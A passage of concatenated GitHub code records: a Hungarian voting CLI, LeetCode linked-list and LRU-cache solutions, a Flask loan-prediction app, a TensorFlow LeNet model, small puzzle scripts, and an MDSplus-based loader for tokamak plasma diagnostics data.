starting_parameter_index = 5\n i = starting_parameter_index\n while (not found) and (i < len(sys.argv)):\n if sys.argv[i] == ']':\n found_at = i\n found = True\n i += 1\n if not found:\n raise Exception('Szintaxishiba: nincsen lezárva a lista!')\n elif found_at == starting_parameter_index:\n raise Exception('Szintaxishiba: nincsen fogadó fél a listában!')\n else:\n receivers = sys.argv[starting_parameter_index: found_at]\n receivers = [profile_id_by_name(s.decode('utf-8')) for s in receivers]\n argument_continue = found_at + 1\n\n date = natural_date_to_sql_datestring(sys.argv[argument_continue].decode('utf-8'))\n reason = sys.argv[argument_continue + 1].decode('utf-8')\n\n vote(sender, receivers, date, reason, type)\n\n leave_db()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n help()\n else:\n process = sys.argv[1]\n\n select_operation(process)\n","repo_name":"organizedConstructors/vakstars","sub_path":"vakstars.py","file_name":"vakstars.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"13297372768","text":"'''\nGiven the head of a singly linked list, group all the nodes with odd indices together followed by the nodes with even indices, and return the reordered list.\n\nThe first node is considered odd, and the second node is even, and so on.\n\nNote that the relative order inside both the even and odd groups should remain as it was in the input.\n\nYou must solve the problem in O(1) extra space complexity and O(n) time complexity.\n'''\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def oddEvenList(self, head):\n temp = head\n odd = ListNode(0)\n odd_head = odd\n even = ListNode(-1)\n even_head = even\n\n i=1\n while temp:\n if i % 2 == 0:\n even.next = temp\n even = even.next\n else:\n odd.next = temp\n odd = odd.next\n temp = temp.next\n i+= 1\n \n odd.next = None\n even.next = None \n\n odd.next = even_head.next\n \n head = odd_head.next\n odd_head.next = None\n\n return head","repo_name":"haruna99/DSA_Questions_and_Answers","sub_path":"linkedlists/oddEvenLinkedlist.py","file_name":"oddEvenLinkedlist.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33037523601","text":"# https://leetcode.com/problems/lru-cache\n\nfrom typing import Dict, Optional\n\n\nclass Node:\n def __init__(self, key: int, value: int):\n self.key = key\n self.value = value\n self.prev: Optional[Node] = None\n self.next: Optional[Node] = None\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self._capacity = capacity\n self._cache: Dict[int, Node] = {}\n self._left = Node(0, 0)\n self._right = Node(0, 0)\n self._left.next = self._right\n self._right.prev = self._left\n\n def get(self, key: int) -> int:\n if key not in self._cache:\n return -1\n\n node = self._cache[key]\n self._remove(node)\n self._append(node)\n return node.value\n\n def put(self, key: int, value: int) -> None:\n if key in self._cache:\n self._remove(self._cache[key])\n\n node = Node(key, value)\n self._append(node)\n self._cache[key] = node\n\n if len(self._cache) > self._capacity:\n lru = self._left.next\n assert lru\n self._remove(lru)\n del self._cache[lru.key]\n\n def _append(self, node: Node) -> None:\n tmp = self._right.prev\n assert tmp\n self._right.prev = node\n node.next = self._right\n node.prev = tmp\n tmp.next = node\n\n def _remove(self, node: Node) -> None:\n assert node.next\n assert node.prev\n node.next.prev = node.prev\n node.prev.next = node.next\n","repo_name":"albertomurillo/leetcode","sub_path":"python/src/problem_146_LRUCache.py","file_name":"problem_146_LRUCache.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17802678522","text":"# save this as app.py\nfrom flask import Flask, escape, request, render_template\nimport pickle\nimport numpy as np\n\napp = Flask(__name__)\nmodel = pickle.load(open('knn.pkl', 'rb'))\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n if request.method == 'POST':\n \n gender = request.form['gender']\n married = request.form['married']\n dependents = request.form['dependents']\n education = request.form['education']\n employed = request.form['employed']\n credit = float(request.form['credit'])\n area = request.form['area']\n ApplicantIncome = float(request.form['ApplicantIncome'])\n CoapplicantIncome = float(request.form['CoapplicantIncome'])\n LoanAmount = float(request.form['LoanAmount'])\n Loan_Amount_Term = float(request.form['Loan_Amount_Term'])\n\n # gender\n if (gender == \"Male\"):\n gender=1\n else:\n gender=0\n \n # married\n if(married==\"Yes\"):\n married = 1\n else:\n married=0\n\n # dependents\n if(dependents=='1'):\n dependents = 1\n dependents = 0\n dependents = 0\n elif(dependents == '2'):\n dependents = 0\n dependents = 1\n dependents = 0\n elif(dependents==\"3+\"):\n dependents = 0\n dependents = 0\n dependents = 1\n else:\n dependents = 0\n dependents = 0\n dependents = 0 \n\n # education\n if (education==\"Not Graduate\"):\n education=1\n else:\n education=0\n\n # employed\n if (employed == \"Yes\"):\n employed=1\n else:\n employed=0\n\n # property area\n\n if(area==\"Semiurban\"):\n area=1\n area=0\n elif(area==\"Urban\"):\n area=0\n area=1\n else:\n area=0\n area=0\n\n\n ApplicantIncomelog = np.log(ApplicantIncome)\n totalincomelog = np.log(ApplicantIncome+CoapplicantIncome)\n LoanAmountlog = np.log(LoanAmount)\n Loan_Amount_Termlog = np.log(Loan_Amount_Term)\n\n prediction = model.predict([[credit, ApplicantIncomelog,LoanAmountlog, Loan_Amount_Termlog, totalincomelog, gender, married, dependents, education, employed,area ]])\n\n # print(prediction)\n\n if(prediction==1):\n prediction=\"Yes\"\n else:\n prediction=\"No\"\n\n\n return render_template(\"prediction.html\", prediction_text=\"loan status is {}\".format(prediction))\n\n\n\n\n else:\n return render_template(\"prediction.html\")\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Vinodkumar-yerraballi/Loan_status_prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"70623271725","text":"# -*- coding: utf-8 -*-\r\nimport tensorflow as tf \r\n#%%\r\ndef lenet(x,keep_prob, n_classes,is_train=True,is_pretrain=True): \r\n conv1 = conv('conv1_1',keep_prob, x, 96, kernel_size=[5,5], stride=[1,2,2,1], is_pretrain=is_pretrain)\r\n x = pool('pool1', conv1, kernel=[1,2,2,1], stride=[1,2,2,1], is_max_pool=True)\r\n conv2 = conv('conv2_1',keep_prob, x, 64, kernel_size=[5,5], stride=[1,2,2,1],is_pretrain=is_pretrain)\r\n x = pool('pool2', conv2, kernel=[1,2,2,1], stride=[1,2,2,1], is_max_pool=True)\r\n fc3 = FC_layer('fc3',keep_prob, x, out_nodes=384,relu=True)\r\n# fc3_n = batch_norm(fc3,is_train,False)\r\n fc4 = FC_layer('fc4',keep_prob,fc3,out_nodes=192,relu=True)\r\n# fc4_n = batch_norm(fc4,is_train,False)\r\n x = FC_layer('out',keep_prob,fc4,out_nodes=n_classes,relu=False)\r\n return conv1,conv2,fc3,x\r\n\r\n#%%\r\ndef conv(layer_name,keep_prob, x, out_channels, kernel_size=[3,3], stride=[1,1,1,1],is_pretrain=True):\r\n in_channels = x.get_shape()[-1]\r\n with tf.variable_scope(layer_name):\r\n w = tf.get_variable(name='weights',\r\n trainable=is_pretrain,\r\n shape=[kernel_size[0], kernel_size[1], in_channels, out_channels],\r\n initializer=tf.contrib.layers.xavier_initializer()\r\n ) \r\n b = tf.get_variable(name='biases',\r\n trainable=is_pretrain,\r\n shape=[out_channels],\r\n initializer=tf.constant_initializer(0.0)) \r\n# tf.add_to_collection('losses', tf.contrib.layers.l2_regularizer(2e-3)(w))\r\n x = tf.nn.conv2d(x, w, stride, padding='SAME', name='conv')\r\n x = tf.nn.bias_add(x, b, name='bias_add')\r\n x = tf.nn.dropout(x,keep_prob)\r\n x = tf.nn.relu(x, name='relu') \r\n return x\r\n#%%\r\ndef pool(layer_name, x, kernel=[1,2,2,1], stride=[1,2,2,1], is_max_pool=True):\r\n if is_max_pool:\r\n x = tf.nn.max_pool(x, kernel, strides=stride, padding='SAME', name=layer_name)\r\n else:\r\n x = tf.nn.avg_pool(x, kernel, strides=stride, padding='SAME', name=layer_name)\r\n return x\r\n\r\n#%%\r\ndef batch_norm(inputs, is_training,is_conv_out=True,decay = 0.999):\r\n\r\n scale = tf.Variable(tf.ones([inputs.get_shape()[-1]]))\r\n beta = tf.Variable(tf.zeros([inputs.get_shape()[-1]]))\r\n pop_mean = tf.Variable(tf.zeros([inputs.get_shape()[-1]]), trainable=False)\r\n pop_var = tf.Variable(tf.ones([inputs.get_shape()[-1]]), trainable=False)\r\n\r\n if is_training:\r\n if is_conv_out:\r\n batch_mean, batch_var = tf.nn.moments(inputs,[0,1,2])\r\n else:\r\n batch_mean, batch_var = tf.nn.moments(inputs,[0]) \r\n\r\n train_mean = tf.assign(pop_mean,\r\n pop_mean * decay + batch_mean * (1 - decay))\r\n train_var = tf.assign(pop_var,\r\n pop_var * decay + batch_var * (1 - decay))\r\n with tf.control_dependencies([train_mean, train_var]):\r\n return tf.nn.batch_normalization(inputs,\r\n batch_mean, batch_var, beta, scale, 0.001)\r\n else:\r\n return tf.nn.batch_normalization(inputs,\r\n pop_mean, pop_var, beta, scale, 0.001)\r\n#%%\r\ndef FC_layer(layer_name,keep_prob, x,out_nodes,relu=True):\r\n shape = x.get_shape()\r\n if len(shape) == 4:\r\n size = shape[1].value * shape[2].value * shape[3].value\r\n else:\r\n size = shape[-1].value\r\n with tf.variable_scope(layer_name):\r\n w = tf.get_variable('weights',\r\n shape=[size, out_nodes],\r\n initializer=tf.contrib.layers.xavier_initializer())\r\n b = tf.get_variable('biases',\r\n shape=[out_nodes],\r\n initializer=tf.constant_initializer(0.0))\r\n# tf.add_to_collection('losses', tf.contrib.layers.l2_regularizer(2e-3)(w))\r\n flat_x = tf.reshape(x, [-1, size])\r\n \r\n x = tf.nn.bias_add(tf.matmul(flat_x, w), b)\r\n x = tf.nn.dropout(x,keep_prob)\r\n if relu==True:\r\n x = tf.nn.relu(x)\r\n return x\r\n#%%\r\ndef loss(logits, labels):\r\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=labels,name='cross-entropy')\r\n loss = tf.reduce_mean(cross_entropy, name='loss') \r\n# tf.add_to_collection('losses', loss)\r\n# loss = tf.add_n(tf.get_collection('losses'))\r\n return loss\r\n \r\n#%%\r\ndef accuracy(logits, labels):\r\n with tf.name_scope('accuracy'):\r\n correct = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\r\n correct = tf.cast(correct, tf.float32)\r\n accuracy = tf.reduce_mean(correct)\r\n return accuracy\r\n#%%\r\ndef num_correct_prediction(logits, labels):\r\n correct = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\r\n correct = tf.cast(correct, tf.int32)\r\n n_correct = tf.reduce_sum(correct)\r\n return n_correct\r\n#%%\r\ndef optimize(loss, learning_rate, global_step):\r\n with tf.name_scope('optimizer'):\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\r\n train_op = optimizer.minimize(loss, global_step=global_step)\r\n return train_op\r\n ","repo_name":"citya1472581234/deep_learning_homework","sub_path":"HW2/problem1/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8340350737","text":"cost = int(input()) # 單位進貨成本\nretailPrice = int(input()) # 單位零售價格\nNumberOfDemand = int(input()) # 需求的可能個數\nprobability = [0.0] * (NumberOfDemand + 1) # 賣出零份、一份直到 N 份報紙的機率分布\nfor i in range(NumberOfDemand + 1):\n probability[i] = float(input())\n\nexpectedProfit = [0.0] * (NumberOfDemand + 1) # 賣j份報紙的預期利潤分布\nbestquantityOfOrder = 0\nfor j in range(NumberOfDemand + 1):\n leftProbabilitySum = 1 # 剩餘機率分布加總\n quantityOfOrder = j # 訂貨量\n bestquantityOfOrder = quantityOfOrder\n for i in range(quantityOfOrder + 1):\n expectedRevenue = i * retailPrice - quantityOfOrder * cost # 期望收入 = 需求個數*零售價 - 訂貨量*單位成本\n if i != quantityOfOrder:\n expectedProfit[j] += expectedRevenue * probability[i] # 期望利潤 = 期望收入*賣出該i份報紙的機率\n leftProbabilitySum -= probability[i]\n else:\n expectedProfit[j] += expectedRevenue * leftProbabilitySum\n\n if j > 0 and expectedProfit[j] < expectedProfit[j - 1]:\n bestquantityOfOrder -= 1\n break\n\nprint(bestquantityOfOrder, int(expectedProfit[bestquantityOfOrder]))\n","repo_name":"weixiang0815/pythonpractice","sub_path":"用Python作商管程式設計/一/w4_2.py","file_name":"w4_2.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43007906063","text":"import numpy as np\nfrom itertools import product\n\nfrom typing import Tuple\n\n\ndef count_neighbours(loc: Tuple, grid: np.array):\n neighbours_slice = tuple(slice(max(k-1, 0), min(k+1, max_k)+1) for k, max_k in zip(loc, grid.shape))\n return np.sum(grid[neighbours_slice]) - grid[loc]\n\n\ndef run(input_grid: np.array, iterations: int, size: int, fourth_dimension: bool):\n\n x_size = y_size = size+2*iterations\n z_size = 2*iterations+1\n w_size = 2*iterations+1 if fourth_dimension else 1\n\n grid = np.zeros((x_size, y_size, z_size, w_size))\n input_grid_slice = slice(iterations, iterations+size)\n grid[input_grid_slice, input_grid_slice, iterations, int(w_size/2)] = (input_grid == '#')\n\n for _ in range(iterations):\n\n next_grid = np.zeros((x_size, y_size, z_size, w_size))\n\n for loc in product(*[range(x) for x in grid.shape]):\n\n num_neighbours = count_neighbours(loc, grid)\n\n if grid[loc] == 1:\n next_grid[loc] = 1 if (2 <= num_neighbours <= 3) else 0\n elif num_neighbours == 3:\n next_grid[loc] = 1\n\n grid = next_grid\n\n return grid.sum()\n\n\nif __name__ == '__main__':\n\n with open('input.txt') as file:\n i = np.array([list(x) for x in file.read().splitlines()])\n\n print(f\"The solution to part 1 = {run(i, 6, 8, False)}\")\n print(f\"The solution to part 2 = {run(i, 6, 8, True)}\")\n","repo_name":"vmenger/AdventOfCode2020","sub_path":"src/day17/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5133405364","text":"from __future__ import print_function\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=UserWarning)\n\nimport MDSplus\nimport numpy as np\nfrom time import time\nfrom scipy.interpolate import interp1d,RectBivariateSpline,NearestNDInterpolator,LinearNDInterpolator,interpn\n\nfrom collections import OrderedDict\nimport tkinter.messagebox\nfrom copy import deepcopy \nimport xarray\nimport sys,os\nnp.seterr(all='raise')\nfrom IPython import embed\nimport matplotlib.pylab as plt\nimport warnings\n\ntry: \n assert 'omfit.py' in sys.argv[0]\n #preferably use OMFITncDataset class from OMFIT, data will be stored as CDF files\n from omfit_classes.omfit_data import OMFITncDataset\n Dataset = OMFITncDataset\n from omfit_classes.omfit_base import OMFITtree\n def Tree(init={}): #emulate behavior of dictionary\n tree = OMFITtree()\n tree.update(init)\n return tree \nexcept:\n #ignore file argument\n def Dataset(file,*args, **kwargs):\n return xarray.Dataset(*args, **kwargs)\n Tree = dict\n \n\ndef print_line(string):\n sys.stdout.write(string)\n sys.stdout.flush()\n\ndef printe(message):\n CSI=\"\\x1B[\"\n reset=CSI+\"m\"\n red_start = CSI+\"31;40m\"\n red_end = CSI + \"0m\" \n print(red_start,message,red_end)\n \ndef mds_load(MDSconn,TDI, tree, shot):\n if tree is not None:\n MDSconn.openTree(tree, shot)\n data = []\n for tdi in TDI:\n try:\n data.append(np.atleast_1d(MDSconn.get(tdi).data()))\n except:\n print('Loading failed: '+tdi)\n data.append(np.array([]))\n try:\n if tree is not None:\n MDSconn.closeTree(tree, shot)\n except:\n pass\n \n return data\n \ndef default_settings(MDSconn, shot):\n #Load revisions of Thompson scattering\n ts_revisions = []\n CHERS_revisions = []\n if MDSconn is not None:\n #load all avalible TS revision\n MDSconn.openTree('ACTIVESPEC', shot)\n \n TDI = rf'_y = getnci(\"MPTS.OUTPUT_DATA.*\", \"node\");'\n TDI+= rf'_s = getnci(\"MPTS.OUTPUT_DATA.*:COMMENT\", \"length\") > 0;'\n TDI+= r'PACK(_y,_s)'\n try:\n ts_revisions = MDSconn.get(TDI).data()\n except:\n ts_revisions = []\n \n if len(ts_revisions) and not isinstance(ts_revisions[0],str): \n ts_revisions = [r.decode() for r in ts_revisions]\n ts_revisions = [r.strip() for r in ts_revisions]\n \n \n TDI = rf'_y = getnci(\"CHERS.ANALYSIS.*\", \"node\");'\n TDI+= rf'_s = getnci(\"CHERS.ANALYSIS.*:DATEANALYZED\", \"length\") > 0;'\n TDI+= r'PACK(_y,_s)'\n try:\n CHERS_revisions = MDSconn.get(TDI).data()\n except:\n CHERS_revisions = []\n \n if len(CHERS_revisions) and not isinstance(CHERS_revisions[0],str): \n CHERS_revisions = [r.decode() for r in CHERS_revisions]\n CHERS_revisions = sorted([r.strip() for r in CHERS_revisions])\n\n MDSconn.closeTree('ACTIVESPEC', shot)\n \n \n \n #build a large dictionary with all settings\n default_settings = OrderedDict()\n #'load_options':{'CER system':{'Analysis':('best', ('best','fit','auto','quick')),\n #'Corrections':{'Zeeman Splitting':True, 'Wall reflections':False}} }}\n \n #share position error between all diags\n horiz_error = {'R shift [cm]':0.0}\n cf_correction = ('Poloidal asymmetry correction',('None',['None','LFS','FSA']))\n\n if len(CHERS_revisions):\n #CT2 is better (for example 139037, CT2 created 2 years after CT1)\n default_chers = CHERS_revisions[-1] \n \n default_settings['Ti']={'systems':{'CER system':[]},\\\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions),'Position error':horiz_error}},\n }\n\n default_settings['omega']= {'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions),'Position error':horiz_error}}}\n \n default_settings['nC6'] = {'systems':{'CER system':[] },\n 'load_options':{'CER system':OrderedDict((('Analysis',(default_chers, CHERS_revisions)),('Position error',horiz_error), cf_correction))}}\n \n TS_options = OrderedDict(((\"TS revision\",('BEST', ts_revisions)),('Position error',horiz_error) ))\n \n default_settings['Te']= {'systems':{'TS system':(['LFS',True],['HFS',True]) },\n 'load_options':{'TS system':TS_options}}\n \n TS_options = OrderedDict(((\"TS revision\",('BEST', ts_revisions)),('Position error',horiz_error),cf_correction))\n \n default_settings['ne']= {'systems':{'TS system':(['LFS',True],['HFS',True])},\n 'load_options':{'TS system':TS_options}}\n \n default_settings['Zeff']= {'systems':{'VB Zeff':(['filterscope',True], )}, 'load_options':{}} \n \n if len(CHERS_revisions):\n default_settings['Mach']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions)}}}\n \n default_settings['Te/Ti']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions)}}} \n default_settings['Zeff']['systems']['CER system'] = (['CHERS',True], )\n default_settings['Zeff']['load_options'] = {'CER system':OrderedDict((('Analysis',(default_chers, CHERS_revisions)),cf_correction))}\n \n\n \n \n return default_settings\n\nclass data_loader:\n \n def __init__(self,MDSconn, shot, eqm, rho_coord, raw=Tree()):\n \n self.MDSconn = MDSconn\n self.shot = shot\n self.eqm = eqm\n self.rho_coord = rho_coord\n self.RAW = raw\n \n def eq_mapping(self,diag, dr=0,dz=0):\n #update equilibrium mapping only if necessary\n\n if 'EQM' in diag and diag['EQM']['id'] == id(self.eqm) and self.eqm.diag == diag['EQM']['ed']\\\n and diag['EQM']['dz'] == np.mean(dz) and diag['EQM']['dr'] == np.mean(dr):\n #skip mapping\n return diag\n\n\n for sys in diag['systems']:\n #check if loaded\n if not sys in diag:\n continue\n \n #list of channels\n if isinstance(diag[sys], list):\n R,Z,T,I = [],[],[],[]\n nt = 0\n for ch in diag[sys]:\n R.append(ch['R'].values)\n Z.append(ch['Z'].values)\n T.append(ch['time'].values)\n I.append(slice(nt, nt+len(T[-1])))\n nt += len(T[-1])\n #empty diag\n if nt == 0:\n continue\n \n R,Z,T = np.hstack(R)[:,None], np.hstack(Z)[:,None],np.hstack(T)\n \n else:\n R = diag[sys]['R'].values\n Z = diag[sys]['Z'].values\n T = diag[sys]['time'].values\n \n #do mapping \n rho = self.eqm.rz2rho(R+dr,Z+dz,T,self.rho_coord)\n try:\n if isinstance(diag[sys], list):\n for ch,ind in zip(diag[sys],I):\n ch['rho'].values = rho[ind,0]\n elif 'rho' in diag[sys]:\n diag[sys]['rho'].values = rho \n else:\n diag[sys]['rho'] = xarray.DataArray(rho, dims=['time','channel'])\n \n except Exception as e:\n print('Error eq_mapping')\n printe(e)\n embed()\n \n diag['EQM'] = Tree({'id':id(self.eqm),'dr':np.mean(dr), 'dz':np.mean(dz),'ed':self.eqm.diag})\n\n return diag\n \n \n \n def __call__(self, quantity=[], options=None,spline_fits=False, tbeg=0, tend=10 ):\n \n if spline_fits:\n return self.load_splines()\n \n \n if quantity == 'elms':\n return self.load_elms(options)\n \n \n if quantity == 'sawteeth':\n return self.load_sawteeth()\n \n if quantity == 'mhd_modes':\n return self.load_mode_loc()\n \n \n \n T = time()\n\n \n options = options[quantity]\n \n\n\n \n systems = []\n if quantity in ['Ti', 'omega', 'nC6','Mach','Te/Ti','Zeff']:\n systems.append('CHERS')\n \n \n if quantity in ['Te', 'ne']:\n for sys, stat in options['systems']['TS system']:\n if stat.get(): systems.append(sys)\n \n data = []\n if quantity in ['Te', 'ne', ]:\n data.append(self.load_ts(tbeg, tend, systems, options['load_options']['TS system']))\n\n if quantity in ['Ti', 'omega', 'nC6'] and len(systems) > 0:\n data.append(self.load_cer(tbeg,tend, systems,options['load_options']['CER system']))\n \n \n #derived quantities\n if quantity == \"Mach\":\n cer = self.load_cer(tbeg,tend,['CHERS'],options['load_options']['CER system']) \n from scipy.constants import e,m_u\n Mach = deepcopy(cer)\n \n omg = cer['CHERS']['omega'].values\n omg_err = cer['CHERS']['omega_err'].values\n ti = np.copy(cer['CHERS']['Ti'].values)\n ti_err = cer['CHERS']['Ti_err'].values\n r = cer['CHERS']['R'].values\n t = cer['CHERS']['time'].values\n Mach['CHERS'] = cer['CHERS'].drop(['omega','omega_err','Ti','Ti_err'])\n\n vtor = omg*r\n vtor_err = omg_err*r\n ti[ti<=0] = 1 #avoid zero division\n vtor[vtor==0] = 1 #avoid zero division\n mach = np.sqrt(2*m_u/e*vtor**2/(2*ti))\n mach_err = mach*np.hypot(vtor_err/vtor,ti_err/ti/2.)*np.sign(ti_err)\n \n #mach number profile is not a flux fucntion, use just LFS value\n R0 = np.interp(t ,self.eqm.t_eq, self.eqm.ssq['Rmag'])\n mach_err[r < R0[:,None]] *= -1\n \n #deuterium mach number \n Mach['CHERS']['Mach'] = xarray.DataArray(mach, dims=['time','channel'], attrs={'units':'-','label':'M_D'})\n Mach['CHERS']['Mach_err'] = xarray.DataArray(mach_err, dims=['time','channel'])\n \n \n data.append(Mach)\n \n\n if quantity == \"Te/Ti\" :\n TS = self.load_ts(tbeg,tend,['LFS','HFS'] )\n CER = self.load_cer(tbeg,tend, systems ,options['load_options']['CER system'] )\n\n R_Te,tvec_Te,data_Te,err_Te = [],[],[],[]\n \n for sys in TS['systems']:\n if sys not in TS: continue \n t = TS[sys]['time'].values\n te = TS[sys]['Te'].values\n e = TS[sys]['Te_err'].values\n r = TS[sys]['R'].values\n r,t = np.meshgrid(r,t)\n \n ind = np.isfinite(e)|(te>0)|(e>0)\n tvec_Te.append(t[ind])\n data_Te.append(te[ind])\n err_Te.append(e[ind])\n R_Te.append(r[ind]) \n \n R_Te = np.hstack(R_Te)\n tvec_Te = np.hstack(tvec_Te)\n data_Te = np.hstack(data_Te)\n err_Te = np.hstack(err_Te)\n\n interp = LinearNDInterpolator(np.vstack((tvec_Te,R_Te)).T, np.copy(data_Te),fill_value=-100)\n Te_Ti = deepcopy(CER)\n for sys in CER['systems']:\n if sys not in CER: continue\n \n r = CER[sys]['R'].values\n t = CER[sys]['time'].values\n r,t = np.meshgrid(r,t)\n \n interp.values[:] = np.copy(data_Te)[:,None] \n Te = np.single(interp(t,r))\n \n interp.values[:] = np.copy(err_Te)[:,None] \n Te_err = np.single(interp(t,r))\n \n Ti = CER[sys]['Ti'].values\n Ti_err = CER[sys]['Ti_err'].values\n \n TeTi_err = Te/(Ti+1)*np.hypot(Te_err/(Te+1),Ti_err/(Ti+1))\n TeTi_err[Ti_err < 0] = -np.infty\n Te_Ti[sys] = CER[sys].drop(['Ti','Ti_err','omega','omega_err','nC6','nC6_err'])\n Te_Ti[sys]['Te/Ti'] = xarray.DataArray(Te/(Ti+1),dims=['time','channel'], attrs={'units':'-','label':'T_e/T_i'})\n Te_Ti[sys]['Te/Ti_err'] = xarray.DataArray(TeTi_err,dims=['time','channel'])\n\n \n data.append(Te_Ti)\n \n \n \n if quantity == \"Zeff\" :\n \n Zeff = self.RAW['Zeff'] = Tree()\n Zeff.setdefault('diag_names',Tree())\n Zeff['systems'] = []\n \n if options['systems']['CER system'][0][1].get():\n\n TS = self.load_ts(tbeg,tend,['LFS','HFS'],options['load_options']['CER system'] )\n try:\n CER = self.load_cer(tbeg,tend, systems ,options['load_options']['CER system'] )\n except:\n printe('Loading of CHERS data failed')\n else:\n R_ne,tvec_ne,data_ne,err_ne = [],[],[],[]\n for sys in TS['systems']:\n if sys not in TS: continue \n t = TS[sys]['time'].values\n ne = TS[sys]['ne'].values\n e = TS[sys]['ne_err'].values\n r = TS[sys]['R'].values\n r,t = np.meshgrid(r,t)\n ind = np.isfinite(e)|(ne>0)|(e>0)\n tvec_ne.append(t[ind])\n data_ne.append(ne[ind])\n err_ne.append(e[ind])\n R_ne.append(r[ind]) \n \n R_ne = np.hstack(R_ne)\n tvec_ne = np.hstack(tvec_ne)\n data_ne = np.hstack(data_ne)\n err_ne = np.hstack(err_ne)\n interp = LinearNDInterpolator(np.vstack((tvec_ne,R_ne)).T, np.copy(data_ne),fill_value=-100)\n\n Zeff['systems']+= CER['systems']\n\n #Zeff = deepcopy(CER)\n for sys in CER['systems']:\n if sys not in CER: continue\n \n\n r = CER[sys]['R'].values\n t = CER[sys]['time'].values\n r,t = np.meshgrid(r,t)\n \n interp.values[:] = np.copy(data_ne)[:,None] \n ne = np.single(interp(t,r))\n \n interp.values[:] = np.copy(err_ne)[:,None] \n ne_err = np.single(interp(t,r))\n \n nC = CER[sys]['nC6'].values\n nC_err = CER[sys]['nC6_err'].values\n \n fC = nC/(ne+1)\n \n Zimp, Zmain = 6,1\n valid = (nC_err > 0)&np.isfinite(nC_err)\n zeff = Zimp*(Zimp - Zmain)*fC + Zmain\n zeff_err = np.ones_like(zeff)\n zeff_err[valid] = (zeff[valid]-Zmain)*np.hypot(ne_err/(ne+1),nC_err/(nC+1))[valid]\n zeff_err[~valid] = -np.infty\n \n Zeff['diag_names'][sys] = ['CHERS'] \n Zeff[sys] = CER[sys].drop(['Ti','Ti_err','omega','omega_err','nC6','nC6_err'])\n Zeff[sys]['Zeff'] = xarray.DataArray(zeff,dims=['time','channel'], attrs={'units':'-','label':'Z_\\mathrm{eff}'})\n Zeff[sys]['Zeff_err'] = xarray.DataArray(zeff_err,dims=['time','channel'])\n \n if options['systems']['VB Zeff'][0][1].get():\n try:\n tree = 'PASSIVESPEC' \n self.MDSconn.openTree(tree, self.shot)\n VB_Zeff = self.MDSconn.get('_x=\\\\'+tree+'::TOP.VISIBLEBREM:Z_EFFECTIVE').data()\n VB_tvec = self.MDSconn.get('dim_of(_x,0)').data()\n \n \n self.MDSconn.closeTree(tree, self.shot)\n ind = (VB_Zeff < 6)&(VB_Zeff > 1)\n VB_Zeff = VB_Zeff[ind]\n VB_tvec = VB_tvec[ind]\n\n Zeff['VB Zeff'] = VB = Dataset('Zeff_VB.nc', attrs={'system':'VB Zeffs'})\n VB['Zeff'] = xarray.DataArray(VB_Zeff,dims=['time'], attrs={'units':'-','label':'Z_\\mathrm{eff}'})\n VB['Zeff_err'] = xarray.DataArray(VB_Zeff*.1,dims=['time'], attrs={'units':'-','label':'Z_\\mathrm{eff}'})\n #location is just a guess\n VB['rho'] = xarray.DataArray(np.zeros_like(VB_tvec)+.1,dims=['time'] )\n VB['diags']= xarray.DataArray(np.tile(('VB Zeff',), VB_tvec.size),dims=['time']) \n VB['time'] = xarray.DataArray(VB_tvec,dims=['time'], attrs={'units':'s'})\n\n #Zeff['systems'].append('VB')\n Zeff['diag_names']['VB Zeff']=['VB Zeff'] \n Zeff['systems']+= ['VB Zeff']\n\n except Exception as e:\n print('VB Zeff error ',e)\n pass\n \n data.append(Zeff)\n \n \n \n \n \n #list of datasets \n output = {'data':[],'diag_names':[]}\n times = []\n for d in data:\n if d is None or not 'systems' in d: continue\n for sys in d['systems']:\n if not sys in d: continue\n if isinstance(d[sys], list):\n for dd in d[sys]:\n if quantity in dd:\n output['data'].append(dd)\n elif quantity in d[sys]:\n output['data'].append(d[sys])\n output['diag_names'].extend(d['diag_names'][sys])\n\n #cut data in the selected range\n for i in range(len(output['data'])):\n times.append(output['data'][i]['time'].values)\n try:\n output['data'][i]= output['data'][i].sel(time=slice(tbeg,tend))\n except:\n #no data in the requested range \n continue\n if len(output['diag_names']) == 0 or len(output['data'])==0:\n tkinter.messagebox.showerror('No data loaded',\n 'No data were loaded. Try to change the loading options ' +str(len(output['diag_names']))+' '+str(len(output['data'])))\n return \n \n \n output['tres']=np.median(np.round(np.diff(np.hstack(times))*1e3,1))/1e3\n output['tres']=round(output['tres'],6)\n if output['tres'] == 0: output['tres'] = 0.01\n 